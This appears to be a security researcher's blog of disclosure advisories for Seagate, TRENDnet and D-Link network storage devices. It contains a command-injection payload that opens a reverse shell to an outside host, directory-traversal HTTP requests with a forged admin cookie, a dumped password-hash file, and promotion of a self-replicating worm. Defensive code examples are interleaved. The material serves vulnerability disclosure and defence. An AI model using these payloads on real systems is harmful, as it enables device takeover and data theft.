Wednesday, February 25, 2015

[Exploit] Seagate BlackArmor Network Storage System


Seagate BlackArmor Business Storage Network Storage System

Vulnerability: Command Injection
CVE: CVE-2014-2701

Description
The Seagate BlackArmor network storage system is susceptible to a root command injection vulnerability, which allows an attacker to inject and execute arbitrary system commands. ISE created a proof of concept that, when executed, grants an attacker full administrative control of the affected system.

—Vulnerable Pages—

POST /index.php/mv_system/send_test_email
POST Data - email_recipients=%3Crecipients%3E%3Crecipient%3E%3Cemail%3E`nc 192.168.1.177 80 -e /bin/sh`%3C%2Femail%3E%3C%2Frecipient%3E%3C%2Frecipients%3E

Attack Requirements
- Authenticated session or valid user credentials (Auth can be bypassed due to broken session management.)
- Ability to access TCP/80 or TCP/443 on the affected system.

Details
This is an authenticated vulnerability, but due to broken session management, a remote adversary is able to call the “/index.php/mv_system/send_test_email” program without authentication. This ultimately results in an unauthenticated OS command injection attack, which is demonstrated in the standalone proof of concept exploit.

This exploit should work against other Seagate Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations
- Avoid calling shell commands when possible
- If an API does not exist, sanitize user input before passing it to a function or class method that executes system commands.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- https://github.com/Gimppy042/exploits/blob/master/network_storage_exploits/seagate_root_cmd_inject.py




Vulnerability: Cross-Site Request Forgery
CVE: Pending

Description
The Seagate BlackArmor is susceptible to several Cross-Site Request Forgery attacks, which allow an attacker to forge HTML forms and execute actions on behalf of the target user.

Attack Requirements
- The victim must have an active web application session.
- The victim must follow a link crafted by an attacker (e.g., by clicking the link directly, or through some other mechanism such as redirection from a malicious site).
- The victim must have the necessary permissions to render and execute the forged HTTP request.

Details
All HTML forms served by the Seagate BlackArmor are susceptible to Cross-Site Request Forgery.

Impact
If an unauthenticated remote attacker is able to fool an authenticated user into clicking a malicious link, the attacker is able to launch an attack that has the capability to compromise the affected system.

Vendor Recommendations
- Cross-Site Request Forgery can be prevented by including an unpredictable token in each HTTP request submitted to the web server. At a minimum, these tokens should be unique to each user, but it is recommended that each HTML form contains unique tokens.
- In addition to HTML form tokens, HTTP referrer checking should be enabled.
- Require users to re-authenticate before performing an application state change.

Solution
- There currently is not a solution to this problem.
- DO NOT STAY LOGGED INTO THE WEB MANAGEMENT INTERFACE.
- Restrict access to WAN and LAN network services.




Vulnerability: Missing Function Level Access Control (Authentication Bypass/Broken Session Management)
CVE: Pending

Description
The Seagate BlackArmor network storage system is susceptible to Missing Function Level Access Control (Authentication bypass due to broken session management) attacks, which ultimately allow an attacker to arbitrarily call system functionality without first authenticating with the system.

Seagate session cookies are generated using user information and then encrypted. The resulting value is then used to keep track of a particular individual's application state. This cookie can be configured with an infinite expiration time, which results in generated cookies lasting forever. To demonstrate this issue, ISE used a permanently authenticated session cookie in conjunction with CVE-2014-2701 to execute operating system commands.

Attack Requirements
- Ability to access TCP/80 or TCP/443 on the affected system.

Details
- This vulnerability should be present in other Seagate Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations
- Proper session management should be utilized. Cookie values should be randomly generated using a secure generator.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- This vulnerability is demonstrated in conjunction with CVE-2014-2701.




Vulnerability: Directory Traversal
CVE: CVE-2014-2702

Description
The Seagate BlackArmor network storage system is susceptible to Directory Traversal attacks, which ultimately allow an attacker to access protected system locations.

Attack Requirements
- Authenticated session or valid user credentials (Authentication Bypass/Broken Session Management)
- Ability to access TCP/80 or TCP/443 on the affected system.

Details
This vulnerability should be present in other Seagate Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can access protected data, which could lead to elevated privileges.

Vendor Recommendations
- Developers should refrain from using user supplied input in calls to the file system
- Developers should perform path canonicalization
- Properly configure network services.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- Calls to “/index.php/mv_backup/get_backup_from_location” require authentication. An attacker can circumvent this by utilizing methods described by Missing Function Level Access Control (Authentication Bypass/Broken Session Management).


—Directory Listing—

POST /index.php/mv_backup/get_backup_from_location
POST Data - task_type=nas_nas&path=%2Fetc&test_connection=+





Vulnerability: Undocumented System User (Backdoor User)
CVE: Pending

Description
The Seagate BlackArmor network storage system contains an undocumented system user. This is the only Seagate system user whose password is protected by the insecure decrypt algorithm.

Details
- This user should be present in other Seagate Network Storage Systems.
- This user can be used to access the Seagate network storage system.

Impact
- Unknown - An attacker could gain system access by leveraging undocumented user accounts.

Vendor Recommendations
- Remove undocumented user accounts.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept

cat /etc/shadow

root:aL86k2VEuV4cY:16378:0:99999:7:::
devuser:x:16378:0:99999:7:::
avahi-autoipd:!:16378:0:99999:7:::
ftp:!:16378:0:99999:7:::
w41t980ck4pu63r:CsRCvByKdCO.c:16378:0:99999:7:::
admin:F1PYtWpQ/pGGY:16378:0:99999:7:::






Disclosure Timeline
- CVE Numbers Assigned - 4/03/2014
- Vendor Notified - 8/19/2014
- Public Disclosure - 2/25/2015

Credit
- Discovered By: Jacob Holcomb (@rootHak42) – Security Analyst @ Independent Security Evaluators
- Exploited By: Jacob Holcomb – Security Analyst (@rootHak42) @ Independent Security Evaluators

Thursday, January 22, 2015

[Exploit] TRENDnet TN-200/200 T1 Network Storage System

TRENDnet TN-200/200 T1 Network Storage System
Note: CVE-2014-1628 and CVE-2014-1630 are used in my N.A.S.ty Worm

Vulnerability: Command Injection

CVE: CVE-2014-1628

Description
The TRENDnet TN-200/200 T1 network storage system is susceptible to several command injection vulnerabilities, which allow an attacker to inject and execute arbitrary system commands. ISE created a proof of concept that, when executed, grants an attacker full administrative control of the affected system.

—Vulnerable Pages—

POST /cgi-bin/system_mgr.cgi
POST Data - cmd=cgi_log_server&f_enable=1&f_ip=`cmd`

POST /cgi-bin/remote_backup.cgi
POST Data - cmd=cgi_server_test&ip=`cmd`&s_type=2&direction=2&task=Test&keep_exist_file=0&local_path=undefined&incremental=0&encryption=0&rsync_user=Gimppy&rsync_pw=&ssh_user=&ssh_pw=&inc_num=-1

Attack Requirements
- Authenticated session or valid user credentials (CVE-2014-1629 Bypasses Auth.)
- Ability to access TCP/80 or TCP/443 on the affected system.

Details
This is an authenticated vulnerability, but if used in conjunction with a Missing Function Level Access Control vulnerability (CVE-2014-1629), a remote adversary can call the “/cgi-bin/system_mgr.cgi” or “remote_backup.cgi” CGI program without authentication. This ultimately results in an unauthenticated OS command injection attack, which is demonstrated in the standalone proof of concept exploit and N.A.S.ty worm.

This exploit should work against other TRENDnet Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations
- Avoid calling shell commands when possible
- If an API does not exist, sanitize user input before passing it to a function or class method that executes system commands.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- https://github.com/Gimppy042/exploits/blob/master/network_storage_exploits/trendnet_tn200_cve2014_1628.c




Vulnerability: Cross-Site Request Forgery
CVE: CVE-2014-1629

Description
The TRENDnet TN-200/200 T1 is susceptible to several Cross-Site Request Forgery attacks, which allow an attacker to forge HTML forms and execute actions on behalf of the target user.

Attack Requirements
- The victim must have an active web application session.
- The victim must follow a link crafted by an attacker (e.g., by clicking the link directly, or through some other mechanism such as redirection from a malicious site).
- The victim must have the necessary permissions to render and execute the forged HTTP request.

Details
All HTML forms served by the TRENDnet TN-200/200 T1 are susceptible to Cross-Site Request Forgery.

Impact
If an unauthenticated remote attacker is able to fool an authenticated user into clicking a malicious link, the attacker is able to launch an attack that has the capability to compromise the affected system.

Vendor Recommendations

- Cross-Site Request Forgery can be prevented by including an unpredictable token in each HTTP request submitted to the web server. At a minimum, these tokens should be unique to each user, but it is recommended that each HTML form contains unique tokens.
- In addition to HTML form tokens, HTTP referrer checking should be enabled.
- Require users to re-authenticate before performing an application state change.
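
The token and referrer recommendations above (given for both the Seagate and TRENDnet devices), sketched as an added example that is not code from either vendor or from the original advisory. The form id and host name used with it are assumptions; tokens are bound to a per-session secret and to one form, and replay protection would additionally need the nonce stored server-side.

```python
import hashlib
import hmac
import re
import secrets
from urllib.parse import urlsplit

NONCE_RE = re.compile(r"[0-9a-f]{32}")


def new_session_secret():
    """One random secret per login session, kept server-side only."""
    return secrets.token_bytes(32)


def _mac(session_secret, form_id, nonce):
    msg = f"{form_id}:{nonce}".encode()
    return hmac.new(session_secret, msg, hashlib.sha256).hexdigest()


def issue_form_token(session_secret, form_id):
    """Unpredictable token, different for every session, form and render."""
    nonce = secrets.token_hex(16)
    return f"{nonce}.{_mac(session_secret, form_id, nonce)}"


def token_is_valid(session_secret, form_id, token):
    """True only if the token was issued for this session and this form."""
    nonce, _, mac = (token or "").partition(".")
    if not NONCE_RE.fullmatch(nonce):
        return False
    expected = _mac(session_secret, form_id, nonce)
    # Constant-time comparison; bytes avoid errors on non-ASCII input.
    return hmac.compare_digest(mac.encode(), expected.encode())


def referer_is_same_origin(referer, expected_host):
    """Second check from the list: the Referer must name our own host."""
    if not referer:
        return False
    parts = urlsplit(referer)
    return parts.scheme in ("http", "https") and parts.netloc == expected_host


def accept_state_change(session_secret, form_id, token, referer, expected_host):
    """Gate for every state-changing POST: both checks must pass."""
    return (referer_is_same_origin(referer, expected_host)
            and token_is_valid(session_secret, form_id, token))
```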

Solution
- There currently is not a solution to this problem.
- DO NOT STAY LOGGED INTO THE WEB MANAGEMENT INTERFACE.
- Restrict access to WAN and LAN network services.




Vulnerability: Missing Function Level Access Control (Authentication Bypass)
CVE: CVE-2014-1630

Description
The TRENDnet TN-200/200 T1 network storage system is susceptible to Missing Function Level Access Control (Authentication Bypass) attacks, which ultimately allow an attacker to arbitrarily call system functionality without first authenticating with the system.

Additionally, the cookie based authentication mechanism utilized by TRENDnet storage systems is severely broken and insecure. For example, TRENDnet uses an authentication cookie named “username” with the value set to the username of the newly authenticated user. This is cryptographically insecure, and allows an adversarial user to hijack an authenticated session by guessing valid usernames of authenticated users.

Attack Requirements
- Ability to access TCP/80 or TCP/443 on the affected system.

Details
- This vulnerability should be present in other TRENDnet Network Storage Systems.
- Missing Function Level Access Control (Authentication Bypass) is only present in firmware versions less than 1.02.
- Broken Session Management (insecure username cookie) is present in firmware versions greater than or equal to 1.02.
- The missing function level access control (Auth Bypass) and broken session management vulnerability should be split into two distinct issues. For clerical reasons, they have been combined into one vulnerability.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations

- Developers should be performing server-side authentication and authorization checks on all system resources.
- Proper session management should be utilized. Cookie values should be randomly generated using a secure generator.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- CVE-2014-1630 is demonstrated in conjunction with CVE-2014-1628 -  https://github.com/Gimppy042/exploits/blob/master/network_storage_exploits/trendnet_tn200_cve2014_1628.c




Vulnerability: Multiple Directory Traversal Vulnerabilities

CVE: CVE-2014-2703

Description
The TRENDnet TN-200/200 T1 network storage system is susceptible to Directory Traversal attacks, which ultimately allow an attacker to assume full control of the affected system by writing to and reading from arbitrary file system locations.

Attack Requirements
- Authenticated session or valid user credentials (CVE-2014-1630 Bypasses Auth.)
- Ability to access TCP/80 or TCP/443 on the affected system.

Details
This vulnerability should be present in other TRENDnet Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations

- Developers should refrain from using user supplied input in calls to the file system
- Developers should perform path canonicalization
- Properly configure network services.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- Calls to “webfile_mgr.cgi” and “folder_tree.cgi” require authentication. An attacker can circumvent this by utilizing methods described by CVE-2014-1630.

—File Upload—

POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
POST Data - cmd=cgi_folder_content&page=1&rp=10&query=&qtype=&f_field=false&used_dir=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2f

POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
POST Data - cmd=chk_file&path=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2f&name=dlink.html




—File Download—

POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
POST Data - cmd=cgi_compress&path=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&type=Folder&name=php&os=UNIX


POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
POST Data - cmd=cgi_download&path=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&path1=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fphp&name=php&type=Folder&browser=f&os=UNIX


—Directory Listing—

POST /cgi-bin/folder_tree.cgi HTTP/1.1
POST Data - dir=%2Fetc%2F&cmd=cgi_open_&show_file=&chk_flag=1&file_type=all&function_id=upnp_av




Vulnerability: Information Disclosure
CVE: CVE-2014-2704

Description
The TRENDnet TN-200/200 T1 network storage system is susceptible to Information Disclosure attacks, which allow an attacker to read arbitrary files from the “xml” and “common” directories located in the web root of the affected system.

Attack Requirements
- Ability to access TCP/80 or TCP/443 on the affected system.

Details
This vulnerability should be present in other TRENDnet Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can access system files located on the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations

- Developers should enforce authentication and authorization before granting access to any file located within the web root.
- Properly configure network services.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.




Disclosure Timeline
- CVE Numbers Assigned - 1/21/2014 and 4/03/2014
- Vendor Notified - 8/19/2014
- Public Disclosure (no vendor response) - 1/22/2015

Credit
- Discovered By: Jacob Holcomb (@rootHak42) – Security Analyst @ Independent Security Evaluators
- Exploited By: Jacob Holcomb – Security Analyst (@rootHak42) @ Independent Security Evaluators

Wednesday, January 21, 2015

[Black Hat USA 2014 Video] My N.A.S.ty BH briefing!

Black Hat USA 2014
Network Attached Shell: N.A.S.ty Systems that Store Network Accessible Shells

Note: I was sick and talked too much. I ran out of time! It was an honor to speak at both Black Hat USA and Black Hat Europe in the same year (2014). I successfully turned the results I presented at Black Hat USA into a piece of self-replicating malware, which I later presented at Black Hat Europe (much better presentation imo haha). Source code is currently unavailable for my N.A.S.ty worm prototype, but I expect to release it soon. Check https://github.com/Gimppy042 frequently, as I will be updating it every so often.

[Exploit] D-Link DNS-345 Network Storage System

D-Link DNS-345 Network Storage System
Note: CVE-2014-2691 and CVE-2014-2692 are used in my N.A.S.ty Worm

Vulnerability: Command Injection
CVE: CVE-2014-2691

Description
The D-Link DNS-345 network storage system is susceptible to several command injection attacks, which allow an attacker to inject and execute arbitrary system commands. ISE created a proof of concept that, when executed, grants an attacker full administrative control of the affected system.

Attack Requirements
- Authenticated session or valid user credentials (CVE-2014-2692 Bypasses Auth.)
- Ability to access TCP/80 or TCP/443 on the affected system.

Details
This is an authenticated vulnerability, but if used in conjunction with a Missing Function Level Access Control vulnerability (below), a remote adversary can call the “/cgi-bin/system_mgr.cgi” program without authentication. This ultimately results in an unauthenticated OS command injection attack, which is demonstrated in the standalone proof of concept exploit and N.A.S.ty worm.

This exploit should work against other D-Link Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations
- Avoid calling shell commands when possible
- If an API does not exist, sanitize user input before passing it to a function or class method that executes system commands.
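
What these two recommendations look like for the `email_recipients` and `f_ip` parameters named in the Seagate and TRENDnet advisories above, as an added example that is not vendor code or part of the original post. The mailer and logger command lines are hypothetical; the point is strict validation followed by an argument vector that never passes through a shell.

```python
import ipaddress
import re
import subprocess
import xml.etree.ElementTree as ET
from urllib.parse import unquote_plus

# Conservative address grammar: starts with an alphanumeric (so it can never
# look like a command-line option) and has no quotes, spaces or shell syntax.
EMAIL_RE = re.compile(
    r"[A-Za-z0-9][A-Za-z0-9._%+-]{0,63}@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")
MAX_FORM_LEN = 4096  # cap input before it reaches the XML parser

# Constructed sample of a well-formed, percent-encoded email_recipients value.
SAMPLE_RECIPIENTS = ("%3Crecipients%3E%3Crecipient%3E%3Cemail%3Eops%40example.com"
                     "%3C%2Femail%3E%3C%2Frecipient%3E%3C%2Frecipients%3E")


def parse_recipients(form_value):
    """Decode email_recipients and return the addresses, or raise ValueError."""
    if len(form_value) > MAX_FORM_LEN:
        raise ValueError("email_recipients too large")
    decoded = unquote_plus(form_value)
    if "<!" in decoded:  # no DOCTYPE or entity declarations in this field
        raise ValueError("email_recipients contains a declaration")
    try:
        root = ET.fromstring(decoded)
    except ET.ParseError as exc:
        raise ValueError("email_recipients is not well-formed XML") from exc
    emails = [node.text or "" for node in root.iter("email")]
    if not emails or not all(EMAIL_RE.fullmatch(e) for e in emails):
        raise ValueError("email_recipients contains an invalid address")
    return emails


def parse_log_server_ip(f_ip):
    """Return f_ip as canonical dotted-quad text, or raise ValueError."""
    # IPv4Address accepts only four decimal octets. IPv6Address is avoided
    # here because it tolerates a free-form "%scope" suffix.
    return str(ipaddress.IPv4Address(f_ip))


def mail_argv(recipients):
    # Hypothetical mailer path; "--" ends option parsing before user data.
    return ["/usr/sbin/sendmail", "-i", "--", *recipients]


def log_server_argv(ip):
    # Hypothetical logger invocation (BusyBox-style "-R host").
    return ["/sbin/syslogd", "-R", ip]


def run_without_shell(argv):
    """Execute argv directly: with no /bin/sh involved, backticks, $ and ;
    are ordinary bytes inside a single argument."""
    return subprocess.run(argv, shell=False, check=True, timeout=10)
```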

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- https://github.com/Gimppy042/exploits/blob/master/network_storage_exploits/dlink_dns345_cve2014_2691.c




Vulnerability: Missing Function Level Access Control (Authentication Bypass)
CVE: CVE-2014-2692

Description
The D-Link DNS-345 network storage system is susceptible to Missing Function Level Access Control (Authentication Bypass) attacks, which ultimately allow an attacker to arbitrarily call system functionality without first authenticating with the system.

Additionally, the cookie based authentication mechanism utilized by D-Link storage systems is severely broken and insecure. For example, D-Link uses an authentication cookie named “username” with the value set to the username of the newly authenticated user. This is cryptographically insecure, and allows an adversarial user to hijack an authenticated session by guessing valid usernames of authenticated users.

Attack Requirements
- Ability to access TCP/80 or TCP/443 on the affected system.

Details
- This vulnerability should be present in other D-Link Network Storage Systems.
- The missing function level access control (Auth Bypass) and broken session management vulnerability should be split into two distinct issues. For clerical reasons, they have been combined into one vulnerability.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations
- Developers should be performing server-side authentication and authorization checks on all system resources.
- Proper session management should be utilized. Cookie values should be randomly generated using a secure generator.
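
A sketch of the session handling these recommendations describe, covering the `username` cookie on the D-Link and TRENDnet devices and the never-expiring cookie on the Seagate device. It is an added example, not vendor code or part of the original post; the `session` cookie name, the role table and the timeout values are assumptions.

```python
import secrets
import time

ADMIN_CMDS = {"cgi_log_server", "cgi_server_test"}  # cmd values from the advisories
ROLES = {"admin": "admin"}  # hypothetical role table; anyone else is a plain user


class SessionStore:
    """Server-side sessions keyed by a random token, with forced expiry."""

    def __init__(self, idle_timeout=900, absolute_lifetime=8 * 3600,
                 clock=time.monotonic):
        self._idle = idle_timeout
        self._absolute = absolute_lifetime
        self._clock = clock
        self._sessions = {}  # token -> [username, created, last_seen]

    def login(self, username):
        """Call only after the password check succeeded; returns the cookie value."""
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        now = self._clock()
        self._sessions[token] = [username, now, now]
        return token

    def authenticate(self, token):
        """Return the username bound to token, or None if unknown or expired."""
        record = self._sessions.get(token)
        if record is None:
            return None  # a guessed value such as "admin" ends up here
        username, created, last_seen = record
        now = self._clock()
        if now - last_seen > self._idle or now - created > self._absolute:
            del self._sessions[token]  # no session lives forever
            return None
        record[2] = now
        return username

    def logout(self, token):
        self._sessions.pop(token, None)


def handle_request(store, cookies, cmd):
    """Check authentication and authorization on every CGI command.

    Returns the HTTP status the server would answer with.
    """
    user = store.authenticate(cookies.get("session", ""))
    if user is None:
        return 401
    if cmd in ADMIN_CMDS and ROLES.get(user, "user") != "admin":
        return 403
    return 200
```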

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- CVE-2014-2692 is demonstrated in conjunction with CVE-2014-2691 - https://github.com/Gimppy042/exploits/blob/master/network_storage_exploits/dlink_dns345_cve2014_2691.c




Vulnerability: Multiple Directory Traversal Vulnerabilities
CVE: CVE-2014-2693

Description
The D-Link DNS-345 network storage system is susceptible to Directory Traversal attacks, which ultimately allow an attacker to assume full control of the affected system by writing to and reading from arbitrary file system locations.

Attack Requirements
- Authenticated session or valid user credentials (CVE-2014-2692 Bypasses Auth.)
- Ability to access TCP/80 or TCP/443 on the affected system.

Details
This vulnerability should be present in other D-Link Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations
- Developers should refrain from using user supplied input in calls to the file system
- Developers should perform path canonicalization
- Properly configure network services.
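
The path canonicalization recommended here and in the Seagate and TRENDnet directory traversal sections, as an added example that is not vendor code or part of the original post. It assumes the share root is `/mnt/HD/HD_a2`, as in the `used_dir` and `path` values shown in these advisories, and that the form value arrives percent-encoded once.

```python
import os
import tempfile
from urllib.parse import quote, unquote


def resolve_form_path(share_root, form_value):
    """Return the canonical path for a form value, or raise PermissionError.

    The value is decoded exactly once, then resolved with realpath so that
    "..", absolute paths and symlinks are all judged by where they really
    point. A literal "%2e%2e" left after one decode is only a file name.
    """
    requested = unquote(form_value)
    if "\x00" in requested:
        raise PermissionError("NUL byte in path")
    root = os.path.realpath(share_root)
    # join() keeps an absolute request absolute and anchors a relative one.
    candidate = os.path.realpath(os.path.join(root, requested))
    # commonpath compares whole components, so "/share_backup" is not
    # mistaken for being inside "/share" as a string-prefix test would.
    if os.path.commonpath([root, candidate]) != root:
        raise PermissionError(f"{requested!r} resolves outside the share")
    # Note: open the returned path promptly; a symlink swapped in after this
    # check is a separate race that needs O_NOFOLLOW-style handling.
    return candidate


def is_allowed(share_root, form_value):
    try:
        resolve_form_path(share_root, form_value)
        return True
    except PermissionError:
        return False


def demo():
    """Run the check against a constructed share in a temporary directory."""
    with tempfile.TemporaryDirectory() as tmp:
        share = os.path.join(tmp, "HD_a2")
        os.makedirs(os.path.join(share, "photos"))
        os.symlink("/etc", os.path.join(share, "link"))  # symlink out of share

        def enc(path):
            return quote(path, safe="")

        return {
            "inside": is_allowed(share, enc(share + "/photos")),
            "dotdot": is_allowed(share, enc(share + "/../../../../../../../../etc")),
            "absolute": is_allowed(share, "%2Fetc%2F"),
            "symlink": is_allowed(share, enc(share + "/link/passwd")),
            "sibling": is_allowed(share, enc(share + "_backup/x")),
        }


if __name__ == "__main__":
    for case, allowed in demo().items():
        print(f"{case:9s} {'allowed' if allowed else 'rejected'}")
```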

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- The following HTTP requests show how an attacker can read and write to the D-Link DNS-345 filesystem. Remember, while calls to “webfile_mgr.cgi” require authentication, an attacker can circumvent this by utilizing methods described by CVE-2014-2692.

—File Upload—

POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
Host: 192.168.1.33
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140207 Firefox/24.0 Iceweasel/24.3.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.33/web/web_file/web_file_server_main.html
Content-Length: 95
Cookie: username=admin
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

cmd=cgi_folder_content&page=1&rp=10&query=&qtype=&f_field=false&used_dir=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2f


POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
Host: 192.168.1.33
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140207 Firefox/24.0 Iceweasel/24.3.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.33/web/web_file/web_file_server.html
Content-Length: 53
Cookie: username=admin
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

cmd=chk_file&path=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2f&name=dlink.html



—File Download—

POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
Host: 192.168.1.33
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140207 Firefox/24.0 Iceweasel/24.3.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.33/web/web_file/web_file_server.html
Content-Length: 111
Cookie: username=admin
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

cmd=cgi_compress&path=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&type=Folder&name=php&os=UNIX



POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
Host: 192.168.1.33
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140207 Firefox/24.0 Iceweasel/24.3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.33/web/web_file/web_file_server_main.html
Cookie: username=admin
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 194

cmd=cgi_download&path=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&path1=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fphp&name=php&type=Folder&browser=f&os=UNIX





Disclosure Timeline
- CVE Numbers Assigned - 4/03/2014
- Vendor Notified - 8/19/2014
- Public Disclosure (no vendor response) - 1/21/2015

Credit
- Discovered By: Jacob Holcomb (@rootHak42) – Security Analyst @ Independent Security Evaluators
- Exploited By: Jacob Holcomb (@rootHak42) – Security Analyst @ Independent Security Evaluators

[Exploit] N.A.S.ty Worm Demo

N.A.S.ty VIDEO COMING SOON!
PROTOTYPE SOURCE CODE WILL BE RELEASED SOON.

In the interim, check out my brief segment on Hacker Hotshots where I discuss my network storage research and demonstrate the capabilities of self-replicating malware!!!